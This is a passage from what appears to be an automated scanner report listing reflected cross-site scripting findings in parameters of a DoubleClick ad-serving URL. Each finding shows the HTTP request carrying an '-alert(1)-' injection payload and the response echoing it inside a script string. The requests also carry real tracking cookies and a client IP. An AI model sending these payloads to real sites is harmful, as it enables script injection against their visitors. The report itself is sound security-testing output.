Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Thu, 12 May 2011 13:33:03 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7210

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Tue Jan 25 16:39:33
...[SNIP]...
//adlog.com.com/adlog/e/r=8041&sg=513717&o=6037%253A13616%253A&h=cn&p=&b=2&l=&site=2&pt=2100&nd=13616&pid=&cid=207595&pp=100&e=&rqid=01c13-ad-e6:4DCB63ED638330&orh=&oepartner=&epartner=&ppartner=&pdom=2449a"-alert(1)-"02e7851709b&cpnmodule=&count=&ra=173.193.214.243&pg=J-kzEAoPOk4AAFIsDHEAAABP&t=2011.05.12.13.27.52&event=58/http://www.cdw.com/content/solutions/network-optimization/?cm_mmc=OnlineAds_Q22011%7CCDW%7CMedlar-_-CNET
...[SNIP]...
2.25. http://ad.doubleclick.net/adi/N1260.cnetzdnet/B5448313.5 [pg parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N1260.cnetzdnet/B5448313.5

Issue detail

The value of the pg request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 68347"-alert(1)-"a281dbf653d was submitted in the pg parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N1260.cnetzdnet/B5448313.5;sz=300x250;pc=cbs513717;click0=http://adlog.com.com/adlog/e/r=8041&sg=513717&o=6037%253A13616%253A&h=cn&p=&b=2&l=&site=2&pt=2100&nd=13616&pid=&cid=207595&pp=100&e=&rqid=01c13-ad-e6:4DCB63ED638330&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=J-kzEAoPOk4AAFIsDHEAAABP68347"-alert(1)-"a281dbf653d&t=2011.05.12.13.27.52&event=58/;ord=2011.05.12.13.27.52? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.zdnet.com/blog/computers/can-intel-cedar-trail-atom-processors-along-with-google-chromebooks-resurrect-the-netbook/5773
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Thu, 12 May 2011 13:33:42 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7210

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Tue Jan 25 16:39:33
...[SNIP]...
cn&p=&b=2&l=&site=2&pt=2100&nd=13616&pid=&cid=207595&pp=100&e=&rqid=01c13-ad-e6:4DCB63ED638330&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=J-kzEAoPOk4AAFIsDHEAAABP68347"-alert(1)-"a281dbf653d&t=2011.05.12.13.27.52&event=58/http://www.cdw.com/content/solutions/network-optimization/?cm_mmc=OnlineAds_Q22011%7CCDW%7CMedlar-_-CNET%2FZDNET-_-96463%7CHardware%7C300x250-_-BRAND_MEDLAR_NETWORKING_N
...[SNIP]...
2.26. http://ad.doubleclick.net/adi/N1260.cnetzdnet/B5448313.5 [pid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N1260.cnetzdnet/B5448313.5

Issue detail

The value of the pid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6d7a7"-alert(1)-"af455f9762e was submitted in the pid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N1260.cnetzdnet/B5448313.5;sz=300x250;pc=cbs513717;click0=http://adlog.com.com/adlog/e/r=8041&sg=513717&o=6037%253A13616%253A&h=cn&p=&b=2&l=&site=2&pt=2100&nd=13616&pid=6d7a7"-alert(1)-"af455f9762e&cid=207595&pp=100&e=&rqid=01c13-ad-e6:4DCB63ED638330&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=J-kzEAoPOk4AAFIsDHEAAABP&t=2011.05.12.13.27.52&event=58/;ord=2011.05.12.13.27.52? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.zdnet.com/blog/computers/can-intel-cedar-trail-atom-processors-along-with-google-chromebooks-resurrect-the-netbook/5773
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Thu, 12 May 2011 13:31:31 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7210

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Tue Jan 25 16:39:33
...[SNIP]...
18%3B4307-300/250%3B40422013/40439800/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs513717%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=8041&sg=513717&o=6037%253A13616%253A&h=cn&p=&b=2&l=&site=2&pt=2100&nd=13616&pid=6d7a7"-alert(1)-"af455f9762e&cid=207595&pp=100&e=&rqid=01c13-ad-e6:4DCB63ED638330&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=J-kzEAoPOk4AAFIsDHEAAABP&t=2011.05.12.13.27.52&event=58/http://ww
...[SNIP]...
2.27. http://ad.doubleclick.net/adi/N1260.cnetzdnet/B5448313.5 [pp parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N1260.cnetzdnet/B5448313.5

Issue detail

The value of the pp request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 80b7b"-alert(1)-"3fb9e79be61 was submitted in the pp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N1260.cnetzdnet/B5448313.5;sz=300x250;pc=cbs513717;click0=http://adlog.com.com/adlog/e/r=8041&sg=513717&o=6037%253A13616%253A&h=cn&p=&b=2&l=&site=2&pt=2100&nd=13616&pid=&cid=207595&pp=10080b7b"-alert(1)-"3fb9e79be61&e=&rqid=01c13-ad-e6:4DCB63ED638330&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=J-kzEAoPOk4AAFIsDHEAAABP&t=2011.05.12.13.27.52&event=58/;ord=2011.05.12.13.27.52? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.zdnet.com/blog/computers/can-intel-cedar-trail-atom-processors-along-with-google-chromebooks-resurrect-the-netbook/5773
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Thu, 12 May 2011 13:31:54 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7210

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Tue Jan 25 16:39:33
...[SNIP]...
3B40422013/40439800/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs513717%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=8041&sg=513717&o=6037%253A13616%253A&h=cn&p=&b=2&l=&site=2&pt=2100&nd=13616&pid=&cid=207595&pp=10080b7b"-alert(1)-"3fb9e79be61&e=&rqid=01c13-ad-e6:4DCB63ED638330&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=J-kzEAoPOk4AAFIsDHEAAABP&t=2011.05.12.13.27.52&event=58/http://www.cdw.com/content/
...[SNIP]...
2.28. http://ad.doubleclick.net/adi/N1260.cnetzdnet/B5448313.5 [ppartner parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N1260.cnetzdnet/B5448313.5

Issue detail

The value of the ppartner request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5a66f"-alert(1)-"7cd177737c8 was submitted in the ppartner parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N1260.cnetzdnet/B5448313.5;sz=300x250;pc=cbs513717;click0=http://adlog.com.com/adlog/e/r=8041&sg=513717&o=6037%253A13616%253A&h=cn&p=&b=2&l=&site=2&pt=2100&nd=13616&pid=&cid=207595&pp=100&e=&rqid=01c13-ad-e6:4DCB63ED638330&orh=&oepartner=&epartner=&ppartner=5a66f"-alert(1)-"7cd177737c8&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=J-kzEAoPOk4AAFIsDHEAAABP&t=2011.05.12.13.27.52&event=58/;ord=2011.05.12.13.27.52? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.zdnet.com/blog/computers/can-intel-cedar-trail-atom-processors-along-with-google-chromebooks-resurrect-the-netbook/5773
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Thu, 12 May 2011 13:32:53 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7210

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Tue Jan 25 16:39:33
...[SNIP]...
fhttp://adlog.com.com/adlog/e/r=8041&sg=513717&o=6037%253A13616%253A&h=cn&p=&b=2&l=&site=2&pt=2100&nd=13616&pid=&cid=207595&pp=100&e=&rqid=01c13-ad-e6:4DCB63ED638330&orh=&oepartner=&epartner=&ppartner=5a66f"-alert(1)-"7cd177737c8&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=J-kzEAoPOk4AAFIsDHEAAABP&t=2011.05.12.13.27.52&event=58/http://www.cdw.com/content/solutions/network-optimization/?cm_mmc=OnlineAds_Q22011%7CCDW%7CMedlar-
...[SNIP]...
2.29. http://ad.doubleclick.net/adi/N1260.cnetzdnet/B5448313.5 [pt parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N1260.cnetzdnet/B5448313.5

Issue detail

The value of the pt request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e566b"-alert(1)-"9a7ddde7086 was submitted in the pt parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N1260.cnetzdnet/B5448313.5;sz=300x250;pc=cbs513717;click0=http://adlog.com.com/adlog/e/r=8041&sg=513717&o=6037%253A13616%253A&h=cn&p=&b=2&l=&site=2&pt=2100e566b"-alert(1)-"9a7ddde7086&nd=13616&pid=&cid=207595&pp=100&e=&rqid=01c13-ad-e6:4DCB63ED638330&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=J-kzEAoPOk4AAFIsDHEAAABP&t=2011.05.12.13.27.52&event=58/;ord=2011.05.12.13.27.52? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.zdnet.com/blog/computers/can-intel-cedar-trail-atom-processors-along-with-google-chromebooks-resurrect-the-netbook/5773
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Thu, 12 May 2011 13:31:03 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7210

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Tue Jan 25 16:39:33
...[SNIP]...
0%3B0%3B62874418%3B4307-300/250%3B40422013/40439800/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs513717%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=8041&sg=513717&o=6037%253A13616%253A&h=cn&p=&b=2&l=&site=2&pt=2100e566b"-alert(1)-"9a7ddde7086&nd=13616&pid=&cid=207595&pp=100&e=&rqid=01c13-ad-e6:4DCB63ED638330&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=J-kzEAoPOk4AAFIsDHEAAABP&t=2011.05.12.13.27.52&even
...[SNIP]...
2.30. http://ad.doubleclick.net/adi/N1260.cnetzdnet/B5448313.5 [ra parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N1260.cnetzdnet/B5448313.5

Issue detail

The value of the ra request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 27907"-alert(1)-"2bb12fa9372 was submitted in the ra parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N1260.cnetzdnet/B5448313.5;sz=300x250;pc=cbs513717;click0=http://adlog.com.com/adlog/e/r=8041&sg=513717&o=6037%253A13616%253A&h=cn&p=&b=2&l=&site=2&pt=2100&nd=13616&pid=&cid=207595&pp=100&e=&rqid=01c13-ad-e6:4DCB63ED638330&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.24327907"-alert(1)-"2bb12fa9372&pg=J-kzEAoPOk4AAFIsDHEAAABP&t=2011.05.12.13.27.52&event=58/;ord=2011.05.12.13.27.52? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.zdnet.com/blog/computers/can-intel-cedar-trail-atom-processors-along-with-google-chromebooks-resurrect-the-netbook/5773
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Thu, 12 May 2011 13:33:32 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7210

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Tue Jan 25 16:39:33
...[SNIP]...
717&o=6037%253A13616%253A&h=cn&p=&b=2&l=&site=2&pt=2100&nd=13616&pid=&cid=207595&pp=100&e=&rqid=01c13-ad-e6:4DCB63ED638330&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.24327907"-alert(1)-"2bb12fa9372&pg=J-kzEAoPOk4AAFIsDHEAAABP&t=2011.05.12.13.27.52&event=58/http://www.cdw.com/content/solutions/network-optimization/?cm_mmc=OnlineAds_Q22011%7CCDW%7CMedlar-_-CNET%2FZDNET-_-96463%7CHardware%7C300x250
...[SNIP]...
2.31. http://ad.doubleclick.net/adi/N1260.cnetzdnet/B5448313.5 [rqid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N1260.cnetzdnet/B5448313.5

Issue detail

The value of the rqid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a6fcc"-alert(1)-"b32620849b2 was submitted in the rqid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N1260.cnetzdnet/B5448313.5;sz=300x250;pc=cbs513717;click0=http://adlog.com.com/adlog/e/r=8041&sg=513717&o=6037%253A13616%253A&h=cn&p=&b=2&l=&site=2&pt=2100&nd=13616&pid=&cid=207595&pp=100&e=&rqid=01c13-ad-e6:4DCB63ED638330a6fcc"-alert(1)-"b32620849b2&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=J-kzEAoPOk4AAFIsDHEAAABP&t=2011.05.12.13.27.52&event=58/;ord=2011.05.12.13.27.52? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.zdnet.com/blog/computers/can-intel-cedar-trail-atom-processors-along-with-google-chromebooks-resurrect-the-netbook/5773
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Thu, 12 May 2011 13:32:14 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7210

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Tue Jan 25 16:39:33
...[SNIP]...
D%3Bpc%3Dcbs513717%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=8041&sg=513717&o=6037%253A13616%253A&h=cn&p=&b=2&l=&site=2&pt=2100&nd=13616&pid=&cid=207595&pp=100&e=&rqid=01c13-ad-e6:4DCB63ED638330a6fcc"-alert(1)-"b32620849b2&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=J-kzEAoPOk4AAFIsDHEAAABP&t=2011.05.12.13.27.52&event=58/http://www.cdw.com/content/solutions/network-optimization/?cm_
...[SNIP]...
2.32. http://ad.doubleclick.net/adi/N1260.cnetzdnet/B5448313.5 [sg parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N1260.cnetzdnet/B5448313.5

Issue detail

The value of the sg request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 64942"-alert(1)-"d331bee272d was submitted in the sg parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N1260.cnetzdnet/B5448313.5;sz=300x250;pc=cbs513717;click0=http://adlog.com.com/adlog/e/r=8041&sg=51371764942"-alert(1)-"d331bee272d&o=6037%253A13616%253A&h=cn&p=&b=2&l=&site=2&pt=2100&nd=13616&pid=&cid=207595&pp=100&e=&rqid=01c13-ad-e6:4DCB63ED638330&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=J-kzEAoPOk4AAFIsDHEAAABP&t=2011.05.12.13.27.52&event=58/;ord=2011.05.12.13.27.52? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.zdnet.com/blog/computers/can-intel-cedar-trail-atom-processors-along-with-google-chromebooks-resurrect-the-netbook/5773
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Thu, 12 May 2011 13:29:27 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7210

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Tue Jan 25 16:39:33
...[SNIP]...
et/click%3Bh%3Dv8/3b05/17/14b/%2a/q%3B240571327%3B0-0%3B0%3B62874418%3B4307-300/250%3B40422013/40439800/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs513717%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=8041&sg=51371764942"-alert(1)-"d331bee272d&o=6037%253A13616%253A&h=cn&p=&b=2&l=&site=2&pt=2100&nd=13616&pid=&cid=207595&pp=100&e=&rqid=01c13-ad-e6:4DCB63ED638330&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg
...[SNIP]...
2.33. http://ad.doubleclick.net/adi/N1260.cnetzdnet/B5448313.5 [site parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N1260.cnetzdnet/B5448313.5

Issue detail

The value of the site request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 20cf0"-alert(1)-"da21d5ca8f4 was submitted in the site parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N1260.cnetzdnet/B5448313.5;sz=300x250;pc=cbs513717;click0=http://adlog.com.com/adlog/e/r=8041&sg=513717&o=6037%253A13616%253A&h=cn&p=&b=2&l=&site=220cf0"-alert(1)-"da21d5ca8f4&pt=2100&nd=13616&pid=&cid=207595&pp=100&e=&rqid=01c13-ad-e6:4DCB63ED638330&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=J-kzEAoPOk4AAFIsDHEAAABP&t=2011.05.12.13.27.52&event=58/;ord=2011.05.12.13.27.52? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.zdnet.com/blog/computers/can-intel-cedar-trail-atom-processors-along-with-google-chromebooks-resurrect-the-netbook/5773
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
